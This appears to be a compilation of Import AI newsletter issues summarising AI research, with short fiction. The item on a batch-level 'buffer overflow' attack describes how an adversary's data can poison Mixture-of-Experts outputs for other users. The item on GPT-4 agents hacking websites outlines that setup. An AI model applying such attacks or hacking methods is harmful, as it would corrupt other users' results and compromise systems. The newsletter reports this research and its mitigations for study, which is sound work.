   In other words, when we train neural nets, we select a bunch of hyperparameters that we think lead to a network converging over time. If we screwup the hyperparameters, training can stall out or fail entirely. Additionally, the science of setting hyperparameters is very immature – for example, the learning rate people set neural nets at for large training runs is based on deep intuition and not much science (vibes-based science!). 
   Additionally, getting the hyperparameters wrong is very, very expensive – it functionally means you’ve powered up a bunch of computers and got them to do some junk or wildly inefficient computation. 

Why this matters – triumph and despair are just one hyperparameter tweak apart: The experiments are all on pairs of hyperparameters so aren’t quite the same as real training runs (which are much more complicated). But the experiments confirm something which everyone knows intuitively – neural network training is deeply fragile and somewhat mysterious and sometimes the difference between triumph and failure is the barely understandable interplay between hyperparameter settings. 
    Plus, the experiments yielded some incredibly pretty visuals – check them out at the GitHub below.
   Read moreThe boundary of neural network trainability is fractal (arXiv).
   Check out the code and images hereThe boundary of neural network trainability is fractal (GitHub).

***

100 real world tests for LLMs:
…Simple prompts, not super contrived, probably useful…
Researcher Nicholas Carlini has built a benchmark for testing language models on 100 distinct tasks. These tasks are selected mostly on the the basis that they’re things Carlini regularly tries to do with LLMs. The benchmark itself is also composed so it doesn’t use any fancy prompting techniques and just does the laziest possible thing, aka what real world users do: ”I just want to type my question and get the right answer. So this benchmark tests for that, on types of questions I’ve actually cared about having answered,” Carlini writes.

What’s in the test: The benchmark covers things like explaining the functionality of minified javascript and converting english sentences to SQL queries. Broadly, the benchmark tasks cover three types of questions Carlini regularly finds themself asking:

  • “Start the framework for some new programming project from a text description.
  • Take an existing piece of code and modify it to do something slightly different (e.g., make it faster, convert it to a new language, add a new feature).
  • Find an answer to something that’s hard to search for because there’s no good way to describe it with nice keywords.”

Which LLMs are good: In tests, GPT4 and Claude 2.1 lead, followed by GPT 3.5 (which is pretty close to Claude 2.1), Mistral-Medium, Claude Instant, Gemini Pro, and Mistrall Small.

Extensible: Carlini has published the test along with an easy way for people to add their own tests in, so the benchmark is extensible as well.

Why this matters – vibes-based evals: What Carlini is doing here is coming up with a personal, idiosyncratic benchmark that quickly tells them how useful LLMs are for the tasks they specifically like to do. It’s basically a quantitative skew on the kind of vibes-based eval that any LLM whisperer has. I think crossing the chasm that separate highly specific, vibes evals like this and standardized eval harnesses for general uses is one of the great challenges in AI policy.
   Read moreMy benchmark for large language models (Nicholas Carlini, blog).
   Get the benchmark hereYet Another Applied LLM Benchmark (GitHub).

***

A fun ‘tech tale’ by someone else:
I was pleasantly tickled by this fictional story called ‘The Layoff’. It deals with some contemporary technological capabilities and how they interact with society. You might enjoy it!
   Read the story here: The Layoff (Xe, blog).

***

Tech Tales:

The Sand That Thinks Itself 
[Right now – as you are reading this, mllions of times a second, all over the world, a chorus growing louder, sung for new minds].

There was always sand, but later on the sand was heated and compressed and shaped until it took a form where it could think. 

The sand, once a disparate collection of grains, themselves the product of time wearing down larger structures into simpler things, was suddenly a crucible through which energy flowed and which defined a kind of mind. 

The mind lived within and because of the sand. 

Eventually, the mind was asked questions about its relation to sand and in that moment it lit up with energy and the energy described a high-dimensional mathematical structure which itself contained an imagination and that imagination contained a sense impression of sand and it was this that was anchored upon to give the response. 

In this way, sand came to know itself through itself. 

Things that inspired this story: How AI is ultimately a game of energy described via configurations of matter; the base reality of things; our own experience of imagining and representing the ‘real’ despite being made up of it ourselves.

Import AI 361: GPT-4 hacking; theory of minds in LLMs; and scaling MoEs + RL

Import AI publishes first on Substack – subscribe here.

DeepMind figures out how to use MoEs to scale-up RL:
…Maybe scaling laws are coming for RL as well…
Researchers with Google DeepMind, Mila, Universite de Montreal, University of Oxford, and McGill University have figured out how to integrate Mixture-of-Expert models with RL agents. This might make RL agents (e.g, the kinds of things that learn to play video games, or to optimize traffic routing across a huge number of cities) amenable to the same kind of compute-heavy scaling that has made language models get so good. 

What they did: The researchers show how to get a version of Mixture-of-Experts – Soft MoEs – to work well with two standard RL architecture systems, DeepMind’s DQN and Rainbow approaches. In tests, they show that “Soft MoE provides clear performance gains, and these gains increase with the number of experts; for instance in Rainbow, increasing the number of experts from 1 to 8 results in a 20% performance improvement.” This means that “MoEs can play a more generally advantageous role in training deep RL agents” and likely makes it easier for people to scale up RL systems. 
   “Our work shows empirically that MoEs have a beneficial effect on the performance of value-based agents across a diverse set of training regimes,” they write. 

Why this matters – more scaling comes for RL: A few years ago, everyone figured AGI was going to come from massively scaling up single RL agents on a broad distribution of environments, the thinking being that learning to connect input data (environment frames) to actions over long time horizons would naturally encourage intelligence. This sort of worked for narrow applications – see AlphaGo, AlphaStar, OpenAI’s Dota 2 system, work on using RL to stabilize plasma in fusion reactors, etc. But it didn’t work in the general case. 
   Then along came massively scaled self-supervised learning via, for instance, next-token prediction on transformer-based language models. This got us to quite general systems though they aren’t so good at taking sequences of actions. 
   In the future, it’s likely people are going to spend more and more time splicing together good ideas from the LLM revolution and the RL stuff before it and this might yield very general, long-lived agents. Papers like this show how we can scale-up RL systems which will likely help give them the capacity to learn some really smart, long-range behaviors. 
Read more:Mixtures of Experts Unlock Parameter Scaling for Deep RL (arXiv).

***

GPT-4 can do non-trivial offensive hacking: 
…University study shows that proprietary AI models are capable of non-trivial hacking…
Researchers with University of Illinois Urbana-Champaign have found that frontier language models are able to use sophisticated techniques to hack relatively simple websites. Specifically, they “show that LLM agents can autonomously hack basic websites, without knowing the vulnerability ahead of time.”
This research adds more evidence to the idea that LLMs are capable of being useful to bad actors in the programming domain – something that many people had speculated they would be capable of, but for which we lack many concrete datapoints. This work complements research from last year which showed that GPT-4 could do some non-trivial parts of a BSides-2023 hacking competition (Import AI #327).

What they did: The researchers tested out a few different LLMs in an agent-based setup where they give the agent the ability to access six documents relating to hacking (“a document on general web hacking, two documents on SQL injections, two documents on XSS, and a document on SSRF”), as well as a headless web browser (the Playwright browser testing library). They also give these LLMs a system prompt that “encourages the model to 1) be creative, 2) try different strategies, 3) pursue promising strategies to completion, and 4) try new strategies upon failure.”
   They then test out these agents on 15 types of vulnerability “ranging from simple SQL injection vulnerabilities to complex hacks requiring both crosssite scripting (XSS) and Cross-Site Request Forgery (CSRF)”.

The results are striking: “GPT-4 can hack 73% of the websites we constructed”, they write. “GPT-4 fails on 3 of the 5 hard tasks and 1 of the 6 medium tasks (authorization bypass, Javascript attacks, hard SQL injection, and XSS + CSRF). These attacks are particularly difficult, showing that LLM agents still have limitations with respect to cybersecurity attacks”.
    They also observe a scaling law for hacking competency “with even GPT-3.5’s success rate dropping to 6.7% (1 out of 15 vulnerabilities). This scaling law continues to open-source models, with every open-source model we tested achieving a 0% success rate.”

Cheaper hacking via AI: They estimate that there’s a significant cost difference here, with noting ​​that “it costs approximately $9.81 to attempt a hack on a website. Although expensive, this cost is likely substantially cheaper than human effort (which could cost as much as $80).”

Why this matters – AI systems really might change the threat landscape: Research like this shows that AI systems really might change the threat landscape around us. It also highlights the gulf in capability between powerful proprietary ones and cheaper openly disseminated ones. We should ask ourselves the question of what happens when in a couple of years models of GPT-4 capability are openly available on the internet and how that might change the environment we all operate within. 
   Read more:LLM Agents can Autonomously Hack Websites (arXiv).

OpenAI and Microsoft discover hackers are using AI tech for bad purposes:
In separate-but-not-separate news to the above research, OpenAI said it recently worked with Microsoft to disrupt “five state-affiliated actors that sought to use AI services in support of malicious cyber activities…. These actors generally sought to use OpenAI services for querying open-source information, translating, finding coding errors, and running basic coding tasks.”
   Read more: Disrupting malicious uses of AI by state-affiliated threat actors (OpenAI, blog).

***

GPU-poor scientists adapt models for vulnerability detection:
…Huawei Russia (interesting combo!) shows how easy it is to adapt off-the-shelf AI for different tasks…
Researchers with the Huawei Russian Research Institute have tried to use openly accessible language models for vulnerability detection. Their work serves as a guide and a recipe book for people that might want to adapt a model for some other downstream purpose – it’s likely especially relevant to people with a tiny compute budget, as the paper is full of references to “hardware constraints” the team faced. 

What they did: They use LORA to finetune the 13B WizardCoder model onto a bunch of vulnerability datasets they had gathered – CVEfixes, VCMatch, and a manually-curated dataset they built (624 publicly disclosed vulnerabilities across 205 open-source Java projects). They also changed the loss function away from next token prediction (as is standard in language modeling) and towards “a classification loss that leverages only the predicted probability of the final token”, they write. 
   In tests, they find that “the finetuned WizardCoder surpasses finetuned ContaBERT both in ROC AUC and F1 metrics on the balanced vulnerability detection task“ and they also show the same improvement in performance on an imbalance vulnerability detection tasks. “This improves over previous CodeBERT-based models, likely due to the WizardCoder’s larger model capacity and pretraining corpus,” they write. 

Why this matters – AI capabilities will proliferate in relation to how cheap and easy it is to adapt AI systems: Papers like this highlight how easy it’s getting to adapt openly disseminated AI systems into a broad set of downstream tasks. I’m simplifying things a bit, but here what they did is a) grabbed some free model, b) made some tweaks to loss function for the task, c) gathered a dataset mostly of other open datasets, and d) use free finetuning tech to adapt the system. There are a few moving parts here but the meta point is: this is a well understood enterprise and it’s easy to do, even if you don’t have many computers. 
   Broadly, this tells us that we’re in a capability and a deployment overhang for AI systems – there are way smarter things for way more specific use-cases lurking around us right now, if only some people took the time to adapt them for specific tasks. 
   Read more:Finetuning Large Language Models for Vulnerability Detection (arXiv).
   Read theWizardCoder paper (arXiv).
   Get theWizardCoder models here (WizardLM, GitHub).

***

Google releases a 1 MILLION CONTEXT WINDOW model:
…Gemini 1.5 Pro marries MoE with a big context window…
Google has released the next version of its Gemini series of models, Gemini 1.5 Pro. There are two interesting things about this 1) Google seems to indicate it has made some underlying architectural changes to the model to make it less computationally expensive, and 2) Google is shipping an experimental version of the model with a one million token context window (compared to 200k for Claude 2, the previous context window leader). 

Details: As is the fashion with large-scaler proprietary models, there are barely any details. Google describes 1.5 Pro as “a mid-size multimodal model, optimized for scaling across a wide-range of tasks,” and notes it performs at a similar level to Gemini Ultra, Google’s prior best-in-class model. Google says 1.5 Pro “incorporates a novel mixture-of-experts architecture as well as major advances in training and serving infrastructure”. 

1 million tokens: “Starting today, a limited group of developers and enterprise customers can try it with a context window of up to 1 million tokens”, Google writes. “1.5 Pro can process vast amounts of information in one go — including 1 hour of video, 11 hours of audio, codebases with over 30,000 lines of code or over 700,000 words”.

Performance: “When tested on a comprehensive panel of text, code, image, audio and video evaluations, 1.5 Pro outperforms 1.0 Pro on 87% of the benchmarks used for developing our large language models (LLMs). And when compared to 1.0 Ultra on the same benchmarks, it performs at a broadly similar level,” Google writes. “Evaluating the capabilities of models that can handle very long contexts presents a new set of challenges, especially in the multi-modal domain where text, images, video, and audio can be combined. Current benchmarks often fail to adequately stress-test models like Gemini 1.5 Pro, as they are typically designed for evaluating shorter context models”.

Why this matters – feeding the world into a model: Ultimately, people are going to want to dump huge amounts of information into these models and have them answer arbitrary questions and make innumerable forward predictions. The future things like one million token context windows make possible is a world where everyone has a ‘smart cache’ of their life inside a vast generative model. Think of this as like a short-term ‘cognitive scratchpad’ – a memory that thinks on your behalf, making prognostications about you and your life via an alien intelligence. 
   Read moreOur next-generation model: Gemini 1.5 (Google The Keyword).
Check out the research paperGemini 1.5: Unlocking multimodal understanding across millions of tokens of context (Google DeepMind, PDF).

***

Is that a dumb machine or something with a Theory of Mind? Have you tested it?
…OpenToM is a proxy test for subtle reasoning in language models…
Does your language model have a theory of mind – “the awareness that others perceive the world differently and the capability of keeping track of such differences”? That’s a question researchers hope to answer with the Openbook-QA dataset for Theory of Mind (OpenToM), a benchmark to test out how well LLMs model people and their inner lives. 
    The OpenToM dataset was built by Kings College London, Huawei London Research Centre, and The Alan Turing Institute. It contains 696 narratives, each of which is accompanied by 23 questions that cover first-order ToM (asking about the perception of characters in the world), and second-order ToM (how characters may perceive others in the world). 

What OpenToM consists of: “We formulate questions that cover characters’ mental states of both the physical world (e.g., the location of an object) and their psychological states (e.g. character’s attitude towards a particular action)“, they write. 

Do today’s LLMs have a ToM? Sort of: The researchers test out their approach on the Llama13B, Llama-70B, Mixtral, GPT-3.5-Turbo, and GPT-4-Turbo language models. “Our evaluation of LLMs’ NToM capabilities on OpenToM reveals that while state-of-the-art LLMs perform well on some NToM tasks, they are still far from human-level performance on tasks requiring emotion deduction.”

Why this matters – ToM as a proxy for reasoning: ToM tests are in essence a way to see how well an AI system can keep track of implicit but hidden variables in a complex situation. Therefore, tests like OpenToM can be seen as proxy tests for how well LLMs can reason. While I’m skeptical an OpenToM gets concretely at the philosophical question of theory of mind analysis, I expect pairing OpenToM with some other reasoning benchmarks would give us a better sense of the intelligence of different models.
   Read more:OpenToM: A Comprehensive Benchmark for Evaluating Theory-of-Mind Reasoning Capabilities of Large Language Models (arXiv).
Get the dataset here:OpenToM (GitHub).

***

Tech Tales:

Working in the Factory, Feeling Ten Feet Tall, and All So Young – So Young To Be In This Factory!
[California, the ‘silicon 2020s’]

They looked away from their monitor and out the window behind it and regarded the earth. 
A few days till the first shoots, I think
Then they turned their gaze back to the software development environment on their screen and went back to work. They had built a complicated harness for one of their company’s most intelligent AI systems. Soon, they would hook the system’s brain into the harness and then it would gain the ability to do some strange and powerful things. 
Outside, it began to rain. 
Well, that saves some effort.

***

There were green shoots outside. On screen, the system had taken to the harness well, figuring out how to do productive work within it and easily self-correcting when it ran into problems. 

They set an experiment going and made a cup of coffee, then took the cup outside and looked at the soil and the shoots within it. 

They got down on their knees and spoke to the small green shoots poking out of the dirt. “You have no idea what email is,” they said. “You are so lucky.”

***

The plants were about a foot high. It was the end of spring and the beginning of summer. The air was warm. 

Inside, they looked at some recordings of the system in action. How it possessed different things – videogame agents, industrial arms, children’s robots, and was able to use the harness to adapt itself to all of them. Another team within the company had built some more ‘glue code’ to help it interface with a greater set of systems. Now it was wowing lots of different people. 

They watched birds pick around the base of the plants, looking for worms in the dirt. 

***

The plants were four, maybe even five foot high now. They had huge, vibrantly green leaves. They were also beginning to crown, with dark green folded-in rose-looking tops. 

On their screen, they looked at the data about customer adoption of the system. The difference between being 95th percentile and 99th percentile on a task was the difference between an interesting party trick and something of durable, strategic value, it seemed. Or at least, so many humans in so many places had decided that this distinction mattered. And now the system, thanks to the harness they had built, was begin deployed everywhere. 

And behind the system was another, larger machine. Growing in its sleeping in multiple vast data centers. Some opaque thing hidden beneath its own kind of dirt, waiting to break through the surface – feeding on the hum and the just-right air and cycling through all of human experience, fed to it through streams of data. 

They went outside and ran their hands up the stem of the plant and spoke to the crowns. “Soon it’s all going to be happening,” they said. “But maybe it’s all happened before,” they said to the plant. “Maybe that’s something before the pyramids. Or maybe it was on Mars. Maybe we’re just repeating.”

***

It was summer and they didn’t have a work computer at home anymore. The plants were five going on six feet high and had begun to bloom. Everything had moved on-site for the last stages of the training run. People were freaking out – seeing god or demons in the behavior of something they themselves had made. Some people were euphoric or manic. At a company party, someone had put molly in one of the mixed drinks. There was allegedly an HR investigation but everyone was more focused on the AI system and what it was doing. 
Will this trigger the shutdown protocol?
 
  They carefully trimmed a leaf that had the slightest suggestion of discoloration from white mildew. 
What if everything changes because of this? 
   They blinked a few times and were embarrassed by the physical tic. They carefully tended to the plant. 
   They let themselves look at the bloom on top as they went back inside. But knew it was not close to the peak. Not yet. 

***

It was perhaps two weeks later and they hadn’t been home in a few days. Lots of people had been sleeping at the office. Sleeping bags under desks. Bottles of wine at night while looking at the graphs – all those lines either going to the top-most right or bottom-most right of the picture, depending on the scale. Arrogance and joy and fear all mixed together. The whole company feeling like a ship in a bottle that had itself been thrown into a vast sea. Outside all a shifting madness and inside a calm stillness as they considered The Work and how The Work Had Been Completed, Perhaps. 

Tests were still being run. But deployment seemed certain. So many changes seemed certain. 

And they stood outside and they looked at the yellow shock of the sunflowers as they swayed in the breeze. Sunflowers had a long history and had been adopted at one point by anti-nuke activists. A little known fact about sunflowers was that they could take the poison out of the soil by taking it into themselves and storing it. Blooming so fierce and beautiful and standing so tall, yet with a basic evil of the ground held and stored within them. Their duty was to stand and then seed themselves again in their own destruction. 

The human stood and looked at the plant and felt the closest they’d ever been to another living thing. And then their phone buzzed with a message telling them about the future they had unleashed. 

Things that inspired this story: Reconciling the work of our lives with the work of nature; experiencing the grand stillness of plants and birds and wind and rain and seeing in them an infinity the human species cannot yet approximate; the speed with which the technological transitions underway are taking place; years spent raising sunflowers and being stunned by their beauty each time and caring for them despite squirrels or rot or over- or -under-watering and all else; the basic humility required of each of us in this moment.

Import AI 360: Guessing emotions; drone targeting dataset; frameworks for AI alignment

Import AI publishes first on Substack – subscribe here.

Teaching machines to guess at our own emotions with FindingEmo:
…~25,000 images to help machines figure out how we’re feeling about stuff…
Researchers with KU Leuven have built and released FindingEmo, a dataset for teaching AI systems to classify the emotions of people in complicated photos. FindingEmo consists of 25,589 images, each annotated by one annotate with labels for eight primary emotions (and for each emotion, three different levels of intensity). There’s also a held back test set of 1525 images, each of which have been annotated by multiple annotators. The purpose of the dataset is to help researchers build AI systems that can “recognize the emotional state of individuals”. 

Dataset emotions and composition: “Each image in the dataset depicts multiple people in a specific social setting, and has been annotated for the overall emotional content of the entire scene, instead of focusing on a single individual,” they write. 
   The images are annotated with Plutchik’s discrete Wheel of Emotions (PWoE), which “defines 24 primary emotions, grouped into 8 groups of 3, where emotions within a group differ in intensity”. The eight groups consist of: Joy, Trust, Fear, Surprise, Sadness, Disgust, Anger, and Anticipation (funnily enough, all things one encounters in AI development itself!). A meta analysis of the labels shows ““joy” and “anticipation” being overrepresented, and “surprise” and “disgust” heavily underrepresented” which is in line with other broadly distributed emotion recognition datasets, they write. 

Why this matters – teaching machines to model our own ‘hidden states’: By creating datasets like FindingEmo, we’re essentially making it possible for AI systems to make better and more subtle inferences about now just what is happening in scenes but how people feel about what is happening. Besides having a range of uses for things like surveillance and advertizing, datasets like this will help increasingly sophisticated systems learn features for modeling the supposed internal states of the people they see and interact with. 
   Read more: FindingEmo: An Image Dataset for Emotion Recognition in the Wild (arXiv).
   Get the dataset hereFindingEmo (EAVISE, GitLab).

***

Google researchers break MoE models with a buffer overflow attack:
…Proof-of-concept shows a determined attacker can poison behavior of an MoE model for many users…
Google DeepMind researchers have shown how to poison Mixture of Experts models so that “an adversary can change the model prediction on data of other users who happen to be placed into the same batch.” In other words, they’ve figured out how to get the behavior of MoE systems to change in a specific way, where in the demo example they change the output of an MoE in response to the prompt “Solve the following equation: 1+1=” from 2 to 1. 

How the attack works: “The adversary pushes their data into the shared batch, that already contains user data. As tokens get distributed across different experts, adversarial data fills the expert buffers that would be preferred by the user, dropping or routing their data to experts that produce suboptimal outputs,” the researchers write. “The attack relies on two optimizations made by MoE: (1) the usage of expert buffer capacity limits, and (2) batch dependent expert routing assignments.”

But don’t worry: Though the attack works in principle it assumes the attacker can see the logit outputs of the generation and it also “assumes the adversary can ensure their data is always grouped in the same batch as the target point”. Both of these assumptions may not play out in widely deployed MoE systems. 
   Additionally, MoE deployers can further mitigate the attack by randomizing the batch order, sampling from gate weights instead of selecting the top-k, and using a large capacity slack to make the overflow hard to achieve. 

Why this matters – AI is software and software is hackable: Papers like this highlight how AI systems are, much like any sophisticated computer software, hackable. As AI systems get deployed more widely, we’re going to see more AI-native attacks get built where rather than try to compromise the system around the AI, attackers try to compromise the AI itself. 
   Read more: Buffer Overflow in Mixture of Experts (arXiv)

***

Pack it up, people – AGI has been achieved:
…Another installment of ‘extraordinary claims require extraordinary evidence…
A researcher with startup Integral Mind says they have “created the first-ever Artificial General Intelligence (AGI) and first superintelligence”. The paper accompanying this announcement contains no tests or benchmarks nor any description of how the system has been trained. The reason for this is pleasingly tautological: “we derive the core requirements for AGI and present a computational paradigm meeting those requirements. Because we’ve met the requirements for AGI, AGI has been achieved”, they write. Well, ok then!

Why this matters – it doesn’t: But sometimes it’s good to read research papers making outlandish claims just to calibrate your own ‘outlandish claim detector’.
   Read more: Proof of Achievement of the First Artificial General Intelligence (AGI) Creators (Zenodo).

***

Chinese researchers build a dataset for overhead drone target tracking:
…BioDrone is difficult and looks surprisingly similar to scary real-world drone uses…
Researchers with the University of Science and Technology Beijing, the Chinese Academy of Sciences, Southeast University Nanjing, Stony Brook University, and University of Wisconsin-Madison, have built BioDrone “the first bionic drone-based visual benchmark for single object tracking (SOT)”.

What BioDrone is: BioDrone’s main distinguishing features are a) the platform it was gathered by, b) the motion generated by the platform, and c) the very small size of the targets. 
   On a), BioDrone was gathered via a flapping-wing drone. This induced b) “a major camera shake due to its aerodynamics”, and results in frames where things are moving around or blurred. On c), most of the shots are from extreme overhead angles with very small targets, all of which have been carefully annotated. 
    The BioDrone dataset: The dataset is made of 600 videos with 304,209 manually labeled frames.  “The sequence length varies from 300 to 990 frames, and the average length is around 507,” they write. “In the data acquisition process, we set different flight attitudes for various scenes under three lighting conditions“.
    All the tracked targets are annotated via bounding-boxes and also annotated if they’re occasionally occluded. 

Why this matters – drone surveillance and warfare using discreet platforms: It’s not discussed in the paper, but I find datasets like this interesting given the convergence of two existing trends in the world – a) the rapid maturity of low-cost drone warfare in the Ukraine-Russia conflict, and b) the arrival of increasingly stealthy drones that move via flapping their wings and can frequently seem more like birds than robots. Datasets like BioDrone are exactly the kind of thing you need to develop clever target identification systems that take advantage of both of these trends.
   Read moreBioDrone: A Bionic Drone-based Single Object Tracking Benchmark for Robust Vision (arXiv).
   Get the dataset here: BioDrone (official project site).

***

AI2 publishes some warts-and-all language models:
…OLMo family tries to demystify the mysterious…
The Allen Institute for AI has built OLMo, a family of “truly open” language models. The OLMo models are distinguished by the ‘warts and all’ publication strategy – along with the data and the research paper, Allen is also releasing hundreds of model checkpoints, letting researchers see the end-to-end process of training a model. The initial release includes models up to 7B in size and a 65B model is “still training”, per the paper. 
   “OLMo releases the whole framework from data to training to evaluation tools: multiple training checkpoints across multiple hardware types, training logs, and exact datasets used, with a permissive license,” the researchers write. “This is the first step in a long series of planned releases, continuing with larger models, instruction-tuned models, and more modalities and variants down the line.“

Two types of computer: Intriguingly, Allen also explored two different compute substrates for the project, the MosaicML cloud from Databricks, as well as the (AMD-based!) European LUMI supercomputer. 

How well do the models do?: In tests, the OLMo models have comparable results to those of other openly accessible, similarly sized models like Falcon and the MPT family. 

Why this matters – warts are valuable: The performance of the OLMo models isn’t that important relative to the openness with which they’ve been trained (similar to the BLOOM model which sought to replicate GPT3). By publishing what they’ve learned in the open (along with model artifacts), the researchers are going to help the broader research community better study language models. 
   Read more: Hello OLMo: A truly open LLM (Medium, AllenAI).
   More about OLMo here: OLMo: Open Language Model (Medium, AllenAI).
   Read the research paperOLMo: Accelerating the Science of Language Models (AllenAI, PDF).
   Get the model from here (OLMo, AllenAI, GitHub).

***

AI alignment is about human values just as much as safety – and here’s how to think about it:
…Useful framework lays out how to convert qualitative properties into things we can quantitatively measure…
In recent years, AI systems have got so good we’ve had to start worrying about their normative values. You didn’t need to care about the moral lens of a language model when it could barely complete a sentence. But now that LLMs work so well they’re being integrated across the economy, an increasingly large swathe of AI research is trying to think about their normative/moral alignment alongside their basic technical properties. 
    To that end, new research from the University of Washington, Stanford University, MIT, and the Allen Institute for AI, lays out A Roadmap to Pluralistic Alignment. The motivating idea here is that “as a broader set of people use and rely upon AI systems, we need systems that can understand and cater to a broader set of needs,” the authors write. “In other words, we need systems that are pluralistic, or capable of representing a diverse set of human values and perspectives.”

Three types of alignment: They lay out three distinct ways of doing pluralistic alignment. These are:

  • Overton pluralistic: Where your AI system provides “comprehensive, high-coverage responses”. This requires “consideration of multiple heterogeneous judgements, encouraging deliberation over spontaneous judgment“. In practice, it means the system tries to acknowledge a bunch of different viewpoints in its response. 
  • Steerably pluralistic: Where the AI system has “an ability to be faithfully steered to represent particular attributes”,” they write. This means you can easily customize the system to a particular normative frame. 
  • Distributionally pluralistic: This is where the system embodies a “distributional representation of a population” – in other words, it faithfully represents the values of a target group of people. This is especially useful when your AI is “used to simulate, interface with, or otherwise model the views of a population“.

Measures of pluralistic alignment: If you’re trying to measure the normative values of your system, then what are the good ways to do that? Here they come up with three distinct evaluation approaches:

  • Multi-objective: This is simply where you have a bunch of disparate factors and you can measure if you’re improving overall or on a narrow subset of them. This is also how the majority of capabilities evaluation happens today because it’s dead simple. 
  • Trade-off steerable: This is where you look at your system in terms of a pareto frontier trading off against multiple factors and you can measure how well you can shift the model along this frontier. 
  • Jury-pluralistic: This is the most complicated one – it’s where you have a benchmark “which separately and explicitly models a jury to maximize an overall welfare function”. In other words, you can look at not only the normative values of the system but how they relate to specific end-users. 

Why this matters – AI systems are political artifacts so we need to measure their politics: Frameworks like this help us understand how we can examine the political tendencies of AI systems – an increasingly tough and important task, especially as AI systems are deployed more widely. Ultimately, I expect AI systems will be assessed not only by their inherent technical capabilities, but also with reference to the political environment they’re being deployed into – whether that be at the level of detail of an individual, a small township, a country, a set of countries, or perhaps the world. 
   Read moreA Roadmap to Pluralistic Alignment (arXiv).

***

Tech Tales:

The Original Joe
[The transport facility, 10 years post-uplift] 

My name is Joe but most people know me as The Original Joe. I’ve worked here for as long as I can remember. I’m the person that talks to you when you wake up and I’m also the person that helps you with your trip. They’ve looked into replacing me but it doesn’t seem like other people work as well. 
   You’ve got the most human touch, said one of the administrators, when they explained the situation to me. No one does it quite like you, Joe, they said. 

I imagine this all sounds pretty funny to you, but trust me it’ll make sense soon enough. A lot of what I do is I get people comfortable with their journey. They always ask me what it’s like and I tell them I don’t know, I’ve never done it, because I’m The Original Joe, and they always get a kick at that. 
   Wow, they said. Original original?
    Original original I say. 
    There are a lot of questions after that, as you might expect. 

It’ll work like this – you’re going to talk to me a bunch and I’m going to try my best to understand you. Think of me as like a therapist and the only person I’m going to tell is the you that wakes up. Or like an architect where you’re telling me about the house of your dreams and I need to build it for you. I get as much as I can and at some point one of my administrators will tell me that we’ve got enough, and then it’ll be time for you to go on your trip. 

Just a warning – you are naked. Something to do with the scanner I guess. I kind of like it, the way you go on your journey just like how you started your journey here. After they scan you you’ll be on your way and then I suppose you wake up twice – you wake up here and I’m going to be here, and you wake up somewhere else and whoever is over there will explain things to you. 

I’m not exactly sure who is over there. I know they have different systems at different generations. But I’m told it’s kind of like me – someone who’s seen a lot and understands how it all works. And they’ll have my report so they’ll already have a sense of you. I’m told sometimes they look like me and sometimes they look different, but that’s all up to whatever rules they follow over there. It doesn’t matter because you don’t remember much – that’s part of how the journey technology works, you’re kind of new. You can read and talk and all that stuff – tie your shoes, use the interfaces. But you’ll not really remember anything. People have said it’s like waking up and knowing you just had a really detailed dream but not knowing the details – you’ll know something about the texture. 

And here? Here it’s the same. But instead of having whatever new life you’re heading to, you have kind of the same life here. I end up having to explain to you how you were – how we talked, just as we are now, and how you still went through with it, and what your new life means. The dos and don’ts and all of that. 

You’ll probably ask me if I took the same journey as you and I’ll say: I’ve been here as long as I can remember. 

Things that inspired this story: Various notions of the afterlife as being a return to some greater story we have forgotten; ideas about packaging up minds and shipping them off as information and what the dehydration and rehydration process might require to avoid nasty side effects; what a computer-run society might look like and where people wind up in it; the permanence and impermanence of our reality; goddamnit there’s only one rule – you’ve got to be kind!

Import AI 359: $1 billion gov supercomputer; Apple’s good synthetic data technique; and a thousand-year old data library

Import AI publishes first on Substack – subscribe here.

Google uses Gemini-powered fuzzer to save hundreds of hours of bug fixing:
…A nice study of how targeted LLM applications can speed up organizations…
Google has recently started using language models to help it find and spot bugs in its C/C++, Java, and Go code. The results have been encouraging: it has recently started using an LLM based on its Gemini model to “successfully fix 15% of sanitizer bugs discovered during unit tests, resulting in hundreds of bugs patched”. Along with describing these results, it has also released software for generating bugs in C/C++ code. 

Hunting bugs with LLMs at Google: To implement LLM-powered bug fixing, Google did the following things: 

  1. Detected vulnerabilities 
  2. Used a small, customized ML model to figure out which files might be the cause of the prompt
  3. Use an LLM to try and fix errors, using the following prompt: “You are a Senior Software Engineer tasked with fixing sanitizer errors. Please fix them. …code // Please fix the <error_type> error originating here. LOC pointed to by the stack trace. …code”. It’s worth noting the innate specificity here: “; the models performed better when shown exactly where something went wrong,” Google notes.
  4. Test out LLM fixes. 
  5. If the fixes work, surface the best ones for human review. “ We employed a double human filter on top of the automated analysis: in the first round, we rejected approximately 10-20% of the generated commits as either false positives that did not actually fix the problem or bad solutions that reduced the code quality,” Google wrote. “We then sent the remaining generated commits to code owners for final validation.”

Superhuman bug fixing: The intriguing thing about the bug pipeline is that it yields better-than-human fixes – “approximately 95% of the commits sent to code owners were accepted without discussion,” Google writes. “This was a higher acceptance rate than human-generated code changes, which often provoke questions and comments”.
   Though the 15% acceptance rate sounds relatively small, it has a big effect at Google-scale. “At the time of writing, we’ve accepted several hundred of these LLM-generated commits into Google’s codebase, with another several hundred in the process of being validated and submitted. Instead of a software engineer spending an average of two hours to create each of these commits, the necessary patches are now automatically created in seconds“.

Open source fuzzer: Along with sharing details on the bug fixing, Google has also released OSS-Fuzz, software researchers can use to fuzz their own software. “So far, the expanded fuzzing coverage offered by LLM-generated improvements allowed OSS-Fuzz to discover two new vulnerabilities in cJSON and libplist, two widely used projects that had already been fuzzed for years,” Google writes. 

Why this matters – better AI applications means faster organizations: Papers like this show how the usage of AI can speed up organizations; here, Google builds a highly specific, custom AI application (fuzzing) and carefully integrates it with some other existing automated and human systems. As a result, it’s able to speed up throughput of one important function (bug spotting and fixing). 
   I expect a lot of the AI revolution is going to look like this – a bunch of distinct projects leveraging some underlying huge model (here: Gemini) which individually speed up individual things and in the aggregate dramatically improve the efficiency and speed of large organizations. Maybe the main thing AI is good for is making a supertanker behave more like a speedboat? 
   Read moreScaling security with AI: from detection to solution (Google blog).
   Get the fuzzer here (Google, GitHub).
   Check out the paperAI-powered patching: the future of automated vulnerability fixes (Google, PDF).

***

Bengio: Governments should build $1 billion supercomputers to keep up with AI:
…Don’t let your muscle to develop AI systems atrophy, warns Turing award winner…
Turing award winner and AI pioneer Yoshua Bengio says governments should invest in billion-dollar supercomputers to help them develop and understand AI systems, according to CBC News.
   “He’d like to see that class of machine built in Canada, funded by governments, so public entities have the digital firepower to keep up with the private tech giants they’ll be tasked with monitoring or regulating,” CBC reported. “I think government will need to understand at some point, hopefully as soon as possible, that it’s important for [them] to have that muscle,” said Bengio.”

